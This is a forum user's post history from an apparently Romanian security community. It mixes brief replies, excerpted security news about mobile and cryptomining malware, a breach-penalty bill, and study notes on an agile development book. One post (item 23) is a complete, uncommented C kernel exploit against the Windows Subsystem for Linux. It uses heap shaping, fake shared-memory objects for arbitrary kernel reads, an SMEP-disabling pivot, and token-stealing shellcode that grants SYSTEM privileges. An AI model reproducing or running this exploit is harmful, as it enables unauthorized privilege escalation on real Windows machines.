
iulik

Active Members
  • Posts: 702
  • Days Won: 18

Everything posted by iulik

  1. Send me the site by PM if you want and I can take a look.
  2. iulik

    1.1.1.1

     I've already switched.
  3. I recommend Nathan for You
  4. Do you want the medication to help you with information?
  5. iulik

    ..

     You can still fight illness, but stupidity...
  6. Security researchers have discovered a massive, continuously growing malware campaign that has already infected nearly 5 million mobile devices worldwide. Dubbed RottenSys, the malware, disguised as a 'System Wi-Fi service' app, came pre-installed on millions of brand new smartphones manufactured by Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE, added somewhere along the supply chain. All these affected devices were shipped through Tian Pai, a Hangzhou-based mobile phone distributor, but researchers are not sure if the company has direct involvement in this campaign. https://thehackernews.com/2018/03/android-botnet-malware.html
  7. Did you ask the Facebook people what happened?
  8. I'd say y got upset with x, y found out x's details and wanted to get revenge. "A hacker hacked another hacker" Reckon 2012
  9. They didn't have more people
  10. Besides the post being very old, I don't recommend adnow to anyone; I got ripped off pretty badly by them
  11. https://thenextweb.com/hardfork/2018/03/07/binance-accidentally-selling-users-cryptocurrency-bitcoin/ @Shocker
  12. It won't let you download it
  13. Let's not forget about: A very good tutorial for anyone; maybe a shortcut could be made in Tutoriale in romana and pinned as sticky, if such a thing is possible on IPB.
  14. @dorianpro, @Ossian It wasn't meant in a mean way, I was simply curious; I thought you were Romanian and had grown up somewhere else. P.S: Welcome.
  15. Don't you know Romanian?
  16. Good luck
  17. Then why did you make the topic?
  18. Two U.S. senators recently proposed cybersecurity legislation that will allow the Federal Trade Commission (FTC) to penalize credit rating industry organizations that don’t properly safeguard data.

     Cybersecurity Legislation Imposes Penalties for Breaches

     In a public statement outlining the proposed Data Breach Prevention and Compensation Act, Sens. Elizabeth Warren (D-Mass.) and Mark Warner (D-Va.) explained that the bill would create a new office at the FTC focused on information protection. If passed, it would enact strict penalties for breaches in customer data. Specifically, credit rating agencies would receive $100 fines for each piece of personally identifiable information (PII) lost in a data breach, plus $50 for each additional PII file per customer. According to SecurityWeek, the bill also requires agencies that fail to comply to pay a maximum penalty of 50 percent of their gross revenue from the year before the incident took place.

     In addition to giving the FTC greater oversight and power over data protection practices, this cybersecurity legislation actually hits harder in terms of fines than the EU’s General Data Protection Regulation (GDPR). While many firms are bracing for GDPR to come into effect later this year, it’s clear that recent security headlines are creating just as much concern among lawmakers on this side of the Atlantic.

     Protecting Consumer Data

     The bill aims to ensure that consumers, whose personal information becomes the ultimate casualty when cybercriminals break into large corporate systems, will be fairly compensated: 50 percent of the fines collected by the FTC would go to the victims. The other half would go toward security research and inspections, SecurityWeek noted, ensuring that the law would also reduce the risk of similar occurrences in the future.

     It’s not unusual for modern governments to consider cybersecurity legislation. Just as credit agencies keep a close eye on how consumers spend their money, the government wants to keep an even closer eye on how these firms are keeping data from prying eyes. https://securityintelligence.com/news/new-cybersecurity-legislation-to-penalize-companies-for-data-breaches/
  19. “Old source code from three years ago appears to have been leaked, but by design the security of our products doesn’t depend on the secrecy of our source code. There are many layers of hardware and software protections built into our products, and we always encourage customers to update to the newest software releases to benefit from the latest protections.”
  20. yes
  21. Today, I started reading The Pragmatic Programmers - "Practices of an Agile Developer" (ISBN 0-9745140-8-X) by Venkat Subramaniam and Andy Hunt because I wanted to learn more about agile development. This blog entry will track and document what I learn by reading this book in the hopes that you will be able to learn as well. However, I would encourage you to read the book for yourself.

     Definition – "Agile development uses feedback to make constant adjustments in a highly collaborative environment."

     Chapter 1 – Agile Software Development

     The Agile Manifesto (agilemanifesto.org)
     • Individuals and interactions over processes and tools
     • Working software over comprehensive documentation
     • Customer collaboration over contract negotiation
     • Responding to change over following a plan

     The Spirit of Agility
     • Continuous development, not episodic
     • Inject energy to resolve friction caused by episodic development

     Chapter 2 – Beginning Agility

     Professional Attitude – "A professional attitude focuses on positive outcomes for the project and the team, on personal and team growth, and on success."

     Quotable Quote – "one popular software methodology suggests you need to fulfill some thirty-five distinct roles on a project, ranging from architect to designer to coder to librarian. Agile methods take a different tack. You perform just one role: software developer. That is you. You do what is needed on the team, working closely with the customer to build software. Instead of relying on Gantt charts and stone tablets, agility relies on people."

     Practice #1 – Work for Outcome
     • Blame does not fix bugs
     "Instead of pointing fingers, point to possible solutions. It is the positive outcome that counts."

     Practice #2 – Quick Fixes Become Quicksand
     • Beware of land mines such as quick fixes and shallow hacks
     • Do not code in isolation to ensure more than one person knows about a certain piece of the project
     • Use unit tests
     "Do not fall for the quick hack. Invest the energy to keep code clean and out in the open."

     Practice #3 – Criticize Ideas, Not People
     • Negativity kills innovation
     "Criticize ideas, not people. Take pride in arriving at a solution rather than proving whose idea is better."
     "There is no absolute best, only better. Despite the popularity of the term, there is no such thing as "best practices," only better practices in a particular situation."

     Practice #4 – Damn the Torpedoes, Go Ahead
     You definitely need to read this section for yourself - basically admit your mistakes and back up your opinions with facts (pros and cons).
     "Do what is right. Be honest, and have the courage to communicate the truth. It may be difficult at times; that is why it takes courage."

     Chapter 3 – Feeding Agility

     Practice #5 – Keep Up with Change
     • Learn iteratively and incrementally
     • Get the latest buzz
     • Attend local user groups
     • Attend workshops or conferences
     • Read voraciously
     "Keep up with changing technology. You do not have to become an expert at everything, but stay aware of where the industry is headed, and plan your career and projects accordingly."

     Practice #6 – Invest in Your Team
     • Training
     "Raise the bar for you and your team. Use brown-bag sessions to increase everyone's knowledge and skills and help bring people together. Get the team excited about technologies or techniques that will benefit your project."

     Practice #7 – Know When to Unlearn
     "One of the foundations of agility is coping with change. Given that change is so constant and pervasive, does it make any sense to keep applying the same techniques and tools you have always used?"
     • Expensive mental models are not discarded lightly
     "Learn the new; unlearn the old. When learning a new technology, unlearn any old habits that might hold you back. After all, there is much more to a car than just a horseless carriage."

     Practice #8 – Question Until You Understand
     • The best question to ask – Why ...?
     "Keep asking Why. Do not just accept what you are told at face value. Keep questioning until you understand the root of the issue."

     Practice #9 – Feel the Rhythm
     • Agile projects have rhythms and cycles
     • Scrum protects the team from requirement changes during a development sprint
     • Time boxing – setting a near-term, hard deadline for an activity that cannot be extended
     "Tackle tasks before they bunch up. It's easier to tackle common recurring tasks when you maintain steady, repeatable intervals between events."

     Chapter 4 – Delivering What Users Want

     Quotable Quote – "In warfare, as in software development, the situation can change quickly and drastically. Sticking to yesterday's plan despite a change in circumstances is a recipe for disaster."

     Practice #10 – Let Customers Make Decisions
     • Decide what you should not decide
     "You do not want to have to make decisions that are business critical by yourself. After all, it is not your business."
     "Let your customers decide. Developers, managers, or business analysts should not make business-critical decisions. Present details to business owners in a language they can understand, and let them make the decision."

     Practice #11 – Let Design Guide, Not Dictate
     • Design should be only as detailed as needed to implement
     • Strategic versus tactical design – strategic is the up-front design before requirements are known
     "A good design is a map; let it evolve. Design points you in the right direction. It is not the territory itself; it should not dictate the specific route. Do not let the design (or the designer) hold you hostage."
     "'No Big Design Up Front' does not mean no design. It just means do not get stuck in a design task without validating it with real code. Diving into code with no idea of a design is just as dangerous. Diving into code is fine for learning or prototyping, as long as you throw the code away afterward."
     "White boards, sketches, and Post-It notes are excellent design tools. Complicated modeling tools have a tendency to be more distracting than illuminating."

     Practice #12 – Justify Technology Use
     • Blindly picking a framework is like having kids to save taxes
     • Pick technology and frameworks based on statements like – "It is too hard to ..." or "It takes too long to ..."
     • Does it really solve the problem?
     • Will you be tied to this technology forever?
     • When technology changes, will you be able to change the design to match technology?
     • What about maintenance costs?
     • Do not build what you can download – reinventing the wheel
     "Choose technology based on need. Determine your needs first, and then evaluate the use of technologies for those specific problems. Ask critical questions about the use of any technology, and answer them genuinely."

     Practice #13 – Keep It Releasable
     • Checked-in code is always ready for action
     • Check out the latest source. Run your local tests. Check in.
     "Keep your project releasable at all times. Ensure that the project is always compilable, runnable, tested, and ready to deploy at a moment's notice."

     Practice #14 – Integrate Early, Integrate Often
     • Never accept big-bang integration
     "Integrate early, integrate often. Code integration is a major source of risk. To mitigate that risk, start integration early and continue to do it regularly."
     "Successful integration means that all the unit tests continue to pass. As per the Hippocratic oath – first, do no harm."
     "For prototypes and experimental code, you may want to work in isolation and not waste effort on integration. But do not stay isolated too long; once you learn from the experience, work toward integration quickly."

     Practice #15 – Automate Deployment Early
     • QA should test deployment
     "Deploy your application automatically from the start. Use that deployment to install the application on arbitrary machines with different configurations to test dependencies. QA should test the deployment as well as your application."

     Practice #16 – Get Frequent Feedback Using Demos
     • Requirements are as fluid as ink
     "Develop in plain sight. Keep your application in sight (and in the customer's mind) during development. Bring customers together and proactively seek their feedback using demos every week or two."

     Practice #17 – Use Short Iterations, Release in Increments
     • Show me a detailed long-term plan, and I will show you a project that is doomed
     • Definition (incremental development) – developing "application functionality in several small groups at a time. Each round of development builds on the functionality of the previous one and adds features that enhance the product's value. You can release or demo the product at that point."
     • Definition (iterative development) – "carry out the various tasks of development - analysis, design, implementation, testing, and seeking feedback - in small, repetitive cycles, called iterations. The end of an iteration marks a milestone. However, the product may or may not be available at that time for real use."
     "Each increment generally includes many iterations."
     "Develop in increments. Release your product with minimal, yet usable, chunks of functionality. Within the development of each increment, use an iterative cycle of one to four weeks or so."

     Practice #18 – Fixed Prices Are Broken Promises
     "We have been talking all along about working in a continuous, iterative, and incremental fashion, and now someone comes along and wants to know ahead of time how long it will take and how much it will cost."
     • A fixed price guarantees a broken promise
     "Estimate based on real work. Let the team actually work on the current project, with the current client, to get realistic estimates. Give the client control over their features and budget."

     Chapter 5 – Agile Feedback

     Practice #19 – Put Angels on Your Shoulder
     • Coding feedback using unit tests
     • Unit testing provides instant feedback
     • Unit testing makes your code robust
     • Unit testing can be a helpful design tool
     • Unit testing is a confidence booster
     • Unit tests can act as probes when solving problems
     • Unit tests are reliable documentation
     • Unit tests are a learning aid
     "Use automated unit tests. Good unit tests warn you about problems immediately. Do not make any design or code changes without solid unit tests in place."

     Practice #20 – Use It Before You Build It
     • Write tests before writing code - test driven development
     "Adding gratuitous code is always a bad idea."
     "Use it before you build it. Use Test Driven Development as a design tool. It will lead you to a more pragmatic and simpler design."
     "Unit tests may not be appropriate when you are experimenting with an idea or prototyping. In the unfortunate case that the code does move forward into the real system, you will have to add the tests, but it is almost always better to start over from scratch."

     Practice #21 – Different Makes a Difference
     • Automate to save time
     "Different makes a difference. Run unit tests on each supported platform and environment combination, using continuous integration tools. Actively find problems before they find you."

     Practice #22 – Automate Acceptance Testing
     "Create tests for core business logic. Have your customers verify these tests in isolation, and exercise them automatically as part of your general test runs."

     Practice #23 – Measure Real Progress
     • Focus on where you are going
     "Measure how much work is left. Do not kid yourself - or your team - with irrelevant metrics. Measure the backlog of work to do."
     "If you are spending so much time keeping track of how much time you are spending that you are not spending enough time working on the project, then you are spending too much time keeping track of how much time you are spending. Get it?"

     Practice #24 – Listen to Users
     • Users are the customer's employees - they are the ones using your software
     "Whether it is a bug in the product, a bug in the documentation, or a bug in our understanding of the user community, it is still the team's problem, not the user's."
     "Every complaint holds a truth. Find the truth, and fix the real problem."

     Chapter 6 – Agile Coding

     Practice #25 – Program Intently and Expressively
     "If someone hands you code that is easy to understand, they are making your life a lot easier. Honoring the Golden Rule, you owe it to them to make your own code easy to read."
     • Program Intently and Expressively (PIE) principle
     "Write code to be clear, not clever. Express your intentions clearly to the reader of the code. Unreadable code is not clever."
     "There is no later. If you cannot do it right now, you will not be able to do it right later."

     Practice #26 – Communicate in Code
     • Do not comment to cover up
     "Should you document all your code? To some extent, yes. But that does not mean you need comments for most of the code you write, especially within the body of your methods. Source code should be understandable not because it has comments but because of its elegance and clarity - proper use of variable names, good use of whitespace, good separation of logic, and concise expression."
     "Comment to communicate. Document code using well-chosen, meaningful names. Use comments to describe its purpose and constraints. Do not use commenting as a substitute for good code."
     "Commenting what the code does is not that useful; instead, comment why it does it."

     Further Readings
     http://www.martinfowler.com/articles/continuousIntegration.html
     http://www.martinfowler.com/articles/designDead.html
  22. So you want us to help you for free, just like that? Come up with something useful for the forum
  23.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/shm.h>

#define RING_SIZE 0x2000000
#define PIPE_SIZE 0xb8
#define PTR_SIZE 0x8
#define STR_HDR_SIZE 0x18
#define LEAK_OFFSET 0x68
#define SHELLCODE_OFFSET 0x200
#define CHUNK_LVXF_OFFSET 0x138f4296
#define CR4_VAL_ADDR 0x506f8
#define MAGIC_KEY 0xefef
#define NT_OFFSET_TO_PIVOT 0x288005

size_t curr_key = 0;

char SHELLCODE[] = {
    //0xcc,
    0x90, // CLI
    0x90, // PUSHFQ
    0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer
    0x50, // PUSH RAX
    0x51, // PUSH RCX
    0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]
    0x90, 0x90, 0x90, // MOV QWORD PTR [RCX], RAX
    0xb9, 0xfc, 0x11, 0x00, 0x00, // MOV ECX, PID
    0x53, // PUSH RBX
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188
    0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS
    0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset]
    //<tag>
    0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
    0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID
    0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4
    0x75, 0xf3, // JNE <tag>
    0x48, 0x8b, 0x58, 0x70, // MOV RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM
    0x90, 0x90, 0x90,
    0x53, // PUSH RBX
    //<tag2>
    0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
    0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID
    0x39, 0xcb, // CMP EBX, ECX // our PID
    0x75, 0xf5, // JNE <tag2>
    0x5b, // POP RBX
    0x48, 0x89, 0x58, 0x70, // MOV QWORD PTR[RAX +0x70], RBX
    0x90, 0x90, 0x90,
    0x5b, // POP RBX
    0x59, // POP RCX
    0x58, // POP RAX
    0x90, // POPFQ
    0xc3 // RET
};

int calc_stop_idx(size_t alloc_size, size_t factor);
int get_size_factor(size_t spray_size, size_t *factor);
int trigger_corruption(int spray_size);
int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx);
int spray(size_t count);
int alloc_sem(size_t factor);
int free_sem(int key);
char *get_faked_shm();
void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid);
void trigger_shm(size_t shmid);
void print_shm(struct shmid_ds *buf);
void *absolute_read(void* obj, size_t shmid, void *addr);
int alloc_shm(size_t key);
int shape(size_t *spray_size);

int calc_stop_idx(size_t alloc_size, size_t factor)
{
    size_t totalStringsLength, headersLength;
    totalStringsLength = (factor - 1) * 2 + 0xd001;
    headersLength = (factor * STR_HDR_SIZE) % (0x100000000);
    return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE;
}

int get_size_factor(size_t spray_size, size_t *factor)
{
    if (spray_size != 0x2000000) {
        printf("SPRAY_SIZE ISSUE\n");
        exit(1);
    }
    *factor = 0xab13aff - 0x800*2;
    return 0x15fffdfc;
}

int trigger_corruption(int spray_size)
{
    size_t factor = 0, alloc_size, stopIdx;
    int ret;
    alloc_size = get_size_factor(spray_size, &factor);
    if (alloc_size < 0) {
        printf("[*err*] unsupported spray_size == 0x%x", spray_size);
        return -1;
    }
    stopIdx = calc_stop_idx(alloc_size, factor);
    ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx);
    printf("[*] trigger_corruption() returned 0x%x\n", ret);
    return 0;
}

int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx)
{
    char **argv, *innerBuf, *stopInnerBuf = NULL;
    size_t pid;
    argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if(!argv) {
        perror("[*err*] malloc argv failed\n");
        return -1;
    }
    innerBuf = (char*)malloc(innerSize);
    if (!innerBuf) {
        printf("[*err*] malloc innerBuf failed\n");
        return -1;
    }
    memset(innerBuf, pattern, innerSize);
    for(size_t i = 0; i < argc - 1; ++i) {
        argv[i] = innerBuf;
    }
    argv[argc-1] = NULL;
    pid = fork();
    if (pid) {
        // parent
        if(stopIdx > 0) {
            sleep(1.5);
            printf("[*] set stopIdx, stopping wildcopy\n");
            argv[stopIdx] = NULL;
        }
        return 0;
    } else {
        // son
        argv[stopIdx - 1] = (char*)malloc(0xe000);
        memset(argv[stopIdx - 1], "X", 0xd000-1);
        argv[stopIdx - 1][0xd000-1] = '\0';
        argv[stopIdx - 7] = (char*)malloc(0xe000);
        memset(argv[stopIdx - 7], "X", 0xd000-1);
        argv[stopIdx - 7][0xd000-1] = '\0';
        // this execve is on nonsense "program", so it will return err.
        // Just kill the thread.
        execve(argv[0], argv, NULL);
        exit(1);
    }
}

/* spray <count> chunks, and return number of total bytes allocated */
int spray(size_t count)
{
    int exec[2];
    int pipe_capacity = 0, ret = 0;
    for (size_t i = 0; i < count; ++i) {
        if (pipe(exec) < 0) {
            printf("[*err*] pipe\n");
            ret = -1;
            goto cleanup;
        }
        pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE);
        if(pipe_capacity < 0) {
            printf("[*err*] fcntl return neg capacity\n");
            ret = -1;
            goto cleanup;
        }
        ret += pipe_capacity;
    }
cleanup:
    return ret;
}

/* allocate 12 * v_nsems + 176 */
int alloc_sem(size_t factor)
{
    int semid;
    int nsems = factor;
    semid = semget(curr_key++, nsems, IPC_CREAT | 0666);
    if(semid == -1) {
        printf("[*err*]semget failed, errno == 0x%x\n", errno);
        return -1;
    }
    return semid;
}

int free_sem(int key)
{
    if(semctl(key, 0, IPC_RMID, 0) == -1) {
        printf("[*err*] semctl failed, errno == 0x%x\n", errno);
        return -1;
    }
    return 0;
}

char *get_faked_shm()
{
    size_t shellcode_length = 0;
    char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
    char *shellcode_ptr;
    if (obj == (void*)-1) {
        printf("[*err*] mmap failed\n");
        return NULL;
    }
    char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0);
    if (cr4_addr == (void*)-1) {
        printf("[*err*] mmap failed\n");
        return NULL;
    }
    memset(cr4_addr, 0x0, 0x10000);
    printf("[*] mmap userspace addr %p, set faked shm object\n", obj);
    obj += 0x1000;
    shellcode_ptr = obj + 0x200;
    initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1);
    return obj;
}

void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid)
{
    size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR;
    char *obj2 = obj+0x1000;
    memset(obj - 0x100, 0x0, 0x1000);
    memcpy(obj, &read_addr, sizeof(size_t));
    memcpy((obj+0x10), &val, sizeof(size_t));
    memcpy(obj - 0x20, &val2, sizeof(size_t));
    memcpy(obj - 0x68, &obj, sizeof(char*));
    memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*));
    memcpy(obj - 0x80, &obj, sizeof(char*));
    memcpy((obj + 0x40), &val, sizeof(size_t));
    memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t));
    memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t));
    memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*));
    memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*));
    memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*));
    memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t));
    memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t)); // refcount
    memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t));
    memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t));
    memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE));
    memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4);
}

void trigger_shm(size_t shmid)
{
    char *data;
    data = shmat(shmid, (void*)0, 0);
}

void print_shm(struct shmid_ds *buf)
{
    printf ("\nThe USER ID = %p\n", buf->shm_perm.uid);
    printf ("The GROUP ID = %p\n", buf->shm_perm.gid);
    printf ("The creator's ID = %p\n", buf->shm_perm.cuid);
    printf ("The creator's group ID = %p\n", buf->shm_perm.cgid);
    printf ("The operation permissions = 0%o\n", buf->shm_perm.mode);
    printf ("The slot usage sequence\n");
    //printf ("number = 0%x\n", buf->shm_perm.seq);
    //printf ("The key= 0%x\n", buf->shm_perm.key);
    printf ("The segment size = %p\n", buf->shm_segsz);
    printf ("The pid of last shmop = %p\n", buf->shm_lpid);
    printf ("The pid of creator = %p\n", buf->shm_cpid);
    printf ("The current # attached = %p\n", buf->shm_nattch);
    printf("The last shmat time = %p\n", buf->shm_atime);
    printf("The last shmdt time = %p\n", buf->shm_dtime);
    printf("The last change time = %p\n", buf->shm_ctime);
}

void *absolute_read(void* obj, size_t shmid, void *addr)
{
    struct shmid_ds shm;
    initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1);
    shmctl(shmid, IPC_STAT, &shm);
    return (void*)shm.shm_ctime;
}

int alloc_shm(size_t key)
{
    int shmid;
    shmid = shmget(key, 1024, 0644 | IPC_CREAT);
    return shmid;
}

int shape(size_t *spray_size)
{
    size_t keys[0x400];
    int exec[2];
    int sv[2];
    char flag;
    size_t bytes = 0, tofree = 0;
    size_t factor,hole_size;
    struct flock fl;
    memset(&fl, 0, sizeof(fl));
    pid_t pid, wpid;
    int status;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) {
        printf("[*err] socketpair failed\n");
        return 1;
    }
    bytes = spray(1);
    if (bytes == (size_t)-1) {
        printf("[*err*] bytes < 0, are you root?\n");
        return 1;
    }
    *spray_size = bytes;
    hole_size = get_size_factor(*spray_size, &factor);
    tofree = hole_size / (bytes / 1) + 1;
    printf("[*] allocate holes before the workspace\n");
    for (int i = 0; i < 0x400; ++i) {
        keys[i] = alloc_sem(0x7000);
    }
    for (int i = 0; i < 0x20; ++i) {
        alloc_sem(0x7000);
    }
    for (int i = 0; i < 0x2000; ++i) {
        alloc_sem(4063);
    }
    for (int i = 0; i < 0x2000; ++i) {
        alloc_sem(3);
    }
    pid = fork();
    if (pid > 0) {
        printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n");
        bytes = spray(5);
        write(sv[1], "p", 1);
        read(sv[1], &flag, 1);
    } else {
        // son
        read(sv[0], &flag, 1);
        printf("[*] alloc workspace pages\n");
        bytes = spray(tofree);
        printf("[*] finish allocate workspace allocations\n");
        write(sv[0], "p", 1);
    }
    if (pid > 0) {
        printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n");
        for (int i = 0; i < 0x100; ++i) {
            alloc_sem(4061);
            for (int j = 0; j < 0x5; ++j) {
                alloc_shm(i * 0x100 + j);
            }
        }
        write(sv[1], "p", 1);
    } else {
        read(sv[0], &flag, 1);
        printf("[*] free middle allocation, creating workspace freed\n");
        exit(1);
    }
    while ((wpid = wait(&status)) > 0);
    printf("[*] free prepared holes, create little pages holes before the workspace\n");
    for (int i = 0; i < 0x400; ++i) {
        free_sem(keys[i]);
    }
    return 0;
}

int main(int argc, char **argv)
{
    size_t spray_size = 0;
    char *obj;
    void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler;
    void *nt_addr;
    obj = get_faked_shm();
    printf("[*] start shaping\n");
    if (shape(&spray_size)) {
        printf("[*err*] shape failed, exit\n");
        return 1;
    }
    // if there is some shm with shmid==0, delete it
    shmctl(0, IPC_RMID, NULL);
    printf("[*] shape is done\n");
    if (trigger_corruption(spray_size) < 0) {
        printf("[*err*] internal error\n");
        return 1;
    }
    sleep(8);
    printf("[*] leak shm, with the corrupted shmid\n");
    paged_pool_addr = absolute_read(obj, 1, NULL);
    printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr);
    file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET);
    printf("[*] infoleak - fileObj addr at %p\n", file_obj);
    lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET);
    printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr);
    nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET);
    printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler);
    printf("[*] call nt pivot, disable SMEP\n");
    initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1);
    trigger_shm(MAGIC_KEY);
    sleep(5);
    printf("[*] jump to shellcode!\n");
    initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1]));
    trigger_shm(MAGIC_KEY);
    sleep(2);
    return 0;
}
```
  24. 2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals. Several cybersecurity firms are reporting new cryptocurrency mining viruses that are being spread using EternalBlue, the same NSA exploit that was leaked by the hacking group Shadow Brokers and responsible for the devastating widespread ransomware threat WannaCry. Researchers from Proofpoint discovered a massive global botnet dubbed "Smominru," a.k.a Ismo, that is using the EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers to secretly mine Monero cryptocurrency, worth millions of dollars, for its master. Active since at least May 2017, the Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows, according to the researchers. "Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz," the researchers said. The botnet operators have already mined approximately 8,900 Monero, valued at up to $3.6 million, at the rate of roughly 24 Monero per day ($8,500) by stealing computing resources of millions of systems. The highest number of Smominru infections has been observed in Russia, India, and Taiwan, the researchers said. https://thehackernews.com/2018/01/cryptocurrency-mining-malware.html